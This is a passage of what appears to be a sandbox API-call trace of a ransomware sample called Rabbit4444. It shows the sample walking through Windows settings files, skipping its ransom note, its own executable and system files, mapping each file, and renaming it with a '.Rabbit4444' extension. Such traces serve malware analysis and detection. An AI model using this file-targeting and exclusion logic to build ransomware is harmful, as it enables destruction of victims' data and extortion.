[0057.360] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.360] lstrlenW (lpString="AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms") returned 69 [0057.360] lstrlenW (lpString="Rabbit4444") returned 10 [0057.360] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.360] lstrlenW (lpString=".dll") returned 4 [0057.360] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.360] lstrlenW (lpString=".lnk") returned 4 [0057.361] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.361] lstrlenW (lpString=".ini") returned 4 [0057.361] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.361] lstrlenW (lpString=".sys") returned 4 [0057.361] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.361] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_setactivationtimeout.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.361] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.361] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14867191694) returned 1 [0057.361] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1300) returned 1 [0057.361] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.361] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0057.361] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.362] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.363] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.363] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.363] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.363] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.363] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.363] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.364] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.364] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.364] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14867434991) returned 1 [0057.364] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.364] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0057.364] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.364] CloseHandle (hObject=0x298) returned 1 [0057.364] CloseHandle (hObject=0x278) returned 1 [0057.364] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms.Rabbit4444") returned 197 [0057.364] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_setactivationtimeout.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_setactivationtimeout.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.365] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a8af6e5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2a8af6e5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms", cAlternateFileName="AA99A4~1.SET")) returned 1 [0057.365] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.365] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.365] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.365] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms", lpString2=".") returned 1 [0057.365] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms", lpString2="..") returned 1 [0057.365] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms", lpString2="windows") returned -1 [0057.365] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.365] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.365] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms", lpString2="boot") returned -1 [0057.365] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.365] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.365] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms") returned="AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms" [0057.365] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.366] lstrlenW (lpString="AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms") returned 67 [0057.366] lstrlenW (lpString="Rabbit4444") returned 10 [0057.366] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.366] lstrlenW (lpString=".dll") returned 4 [0057.366] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.366] lstrlenW (lpString=".lnk") returned 4 [0057.366] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.366] lstrlenW (lpString=".ini") returned 4 [0057.366] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.366] lstrlenW (lpString=".sys") returned 4 [0057.366] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.366] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_setscrolldirection.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.366] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.366] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14867683967) returned 1 [0057.366] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1290) returned 1 [0057.366] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.366] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0057.366] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0057.367] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0057.368] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.368] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0057.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.368] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.368] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.369] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0057.369] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14867929819) returned 1 [0057.369] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.369] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0057.369] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.369] CloseHandle (hObject=0x298) returned 1 [0057.369] CloseHandle (hObject=0x278) returned 1 [0057.369] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms.Rabbit4444") returned 195 [0057.369] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_setscrolldirection.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_setscrolldirection.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.370] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b6fd883, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2b6fd883, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms", cAlternateFileName="AAE53C~1.SET")) returned 1 [0057.370] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.370] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.370] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.370] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms", lpString2=".") returned 1 [0057.370] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms", lpString2="..") returned 1 [0057.370] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms", lpString2="windows") returned -1 [0057.370] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.370] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.370] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms", lpString2="boot") returned -1 [0057.370] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.370] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.370] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms") returned="AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms" [0057.370] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.370] lstrlenW (lpString="AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms") returned 59 [0057.370] lstrlenW (lpString="Rabbit4444") returned 10 [0057.370] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.370] lstrlenW (lpString=".dll") returned 4 [0057.370] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.370] lstrlenW (lpString=".lnk") returned 4 [0057.370] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.370] lstrlenW (lpString=".ini") returned 4 [0057.370] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.370] lstrlenW (lpString=".sys") returned 4 [0057.370] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.371] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_tapanddrag.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.371] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.371] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14868154913) returned 1 [0057.371] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1250) returned 1 [0057.371] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0057.371] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0057.371] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0057.372] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0057.373] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.373] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.373] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.373] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0057.373] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.373] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0057.373] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.373] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.373] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14868408691) returned 1 [0057.373] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0057.373] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0057.373] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.374] CloseHandle (hObject=0x298) returned 1 [0057.374] CloseHandle (hObject=0x278) returned 1 [0057.374] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms.Rabbit4444") returned 187 [0057.374] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_tapanddrag.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_tapanddrag.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.374] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bf2fa2d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2bf2fa2d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms", cAlternateFileName="AA27D0~1.SET")) returned 1 [0057.374] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.374] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.375] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.375] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.375] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.375] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.375] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.375] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.375] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.375] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.375] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.375] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms") returned="AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms" [0057.375] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.375] lstrlenW (lpString="AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms") returned 60 [0057.375] lstrlenW (lpString="Rabbit4444") returned 10 [0057.375] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.375] lstrlenW (lpString=".dll") returned 4 [0057.375] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.375] lstrlenW (lpString=".lnk") returned 4 [0057.375] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.375] lstrlenW (lpString=".ini") returned 4 [0057.375] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.375] lstrlenW (lpString=".sys") returned 4 [0057.375] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.375] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_tapsenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.376] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.376] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14868640211) returned 1 [0057.376] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1255) returned 1 [0057.376] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0057.376] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0057.376] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0057.378] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0057.379] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.379] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.379] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.379] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.379] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.380] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.380] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.380] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.380] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14869040474) returned 1 [0057.380] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0057.380] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0057.380] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.380] CloseHandle (hObject=0x298) returned 1 [0057.380] CloseHandle (hObject=0x278) returned 1 [0057.380] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms.Rabbit4444") returned 188 [0057.380] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms" (normalized: 